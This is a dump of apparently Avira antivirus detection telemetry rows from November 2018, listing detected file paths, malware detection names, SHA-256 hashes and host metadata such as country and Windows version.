  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\11A4B7E010799154DDC53E76332C031C22DADA19A2803E99942CF60196929396', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:29:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194207-4dff4db4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194207-4DFF4DB4', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:42:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='drz-vc6t.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\DRZ-VC6T\\DRZ-VC6T.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0114436.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0114436.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06a2488d06c173ab33f005a42f3213148694c90b2ae97ee2411d2ddd3043840b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\06A2488D06C173AB33F005A42F3213148694C90B2AE97EE2411D2DDD3043840B', filesize=768000, name='PUA/SoftPulse.aonb.#M1.#R1'), hash='06a2488d06c173ab33f005a42f3213148694c90b2ae97ee2411d2ddd3043840b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gaara.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Gaara\\Gaara.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='4317f3f043d59dc9ba3a58ad4aee421af6b84509720b3b6574fd1e38c2e44dc8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_music.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\sxx\\_Music\\_Music.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152609-72cdd037', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152609-72CDD037', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:29:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120548-161f5849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120548-161F5849', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124433-69285301', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-124433-69285301', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:47:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055620-fda39565', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055620-FDA39565', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061239-45565931', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061239-45565931', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='helper.exe', filepath='C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe', filesize=924000, name='W32/Neshta.A.#M1.#R1'), hash='55d27981db729b84bebfa965956ec0458af866c30d2ba781fa32c48c3c7dba43', metadata=Row(cmdline='--engine=2 --session-id=xEZ5K0me9D5AhvuygCu58rLzurfu44PRULxy+8cD --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T12:22:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055237-7928d1ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055237-7928D1EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153225-b8bad5d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153225-B8BAD5D2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='62d7835ba92d38b165a02f6b16f881f7be7c6931fbda01a4ff38506bf7421a96', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pnvpnouy.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\pNvPnoUy.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050238-7d6c2ecb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050238-7D6C2ECB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104834-7d1e3367', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b0158ab6\\AVSCAN-20181102-104821-7A9244C0\\AVSCAN-20181102-104834-7D1E3367', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='567e5c64116d97adbeed15fcd72d22c445ca6fcebed81851e4bcfc5e4b253909', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153924-0687c330', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153924-0687C330', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:42:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-070147-ea93824d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a241514\\AVSCAN-20181103-070133-E7C4801C\\AVSCAN-20181103-070147-EA93824D', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:01:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050940-78f9311a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050940-78F9311A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061220-39fa0a09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061220-39FA0A09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053218-a22e0548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053218-A22E0548', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212347-185649d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9dd79112\\AVSCAN-20181102-212239-0F3EE3F5\\AVSCAN-20181102-212347-185649D8', filesize=192000, name='HEUR/AGEN.1014163.#M1.#R1'), hash='4ad4aa15337e64c3737556187a28f047fe900c106b402e26f4dd0a4edc51c1e4', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:23:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='halpxazv.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\haLpxaZv.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='73b082d38a07fbc86f3a85587d92a99a76eadce1fd88e67e941198e779711e42', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\73B082D38A07FBC86F3A85587D92A99A76EADCE1FD88E67E941198E779711E42', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='73b082d38a07fbc86f3a85587d92a99a76eadce1fd88e67e941198e779711e42', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061405-78930036', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061405-78930036', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061925-3782b95a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061925-3782B95A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061625-cc13ba29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061625-CC13BA29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054731-c29b24d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054731-C29B24D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061122-175a5294', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061122-175A5294', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053524-11026f26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053524-11026F26', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055038-31dffbe9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055038-31DFFBE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053649-4411ab4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053649-4411AB4F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050501-d2b7fc1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050501-D2B7FC1D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:00Z'), dt=datetime.date(2018, 11, 2)),
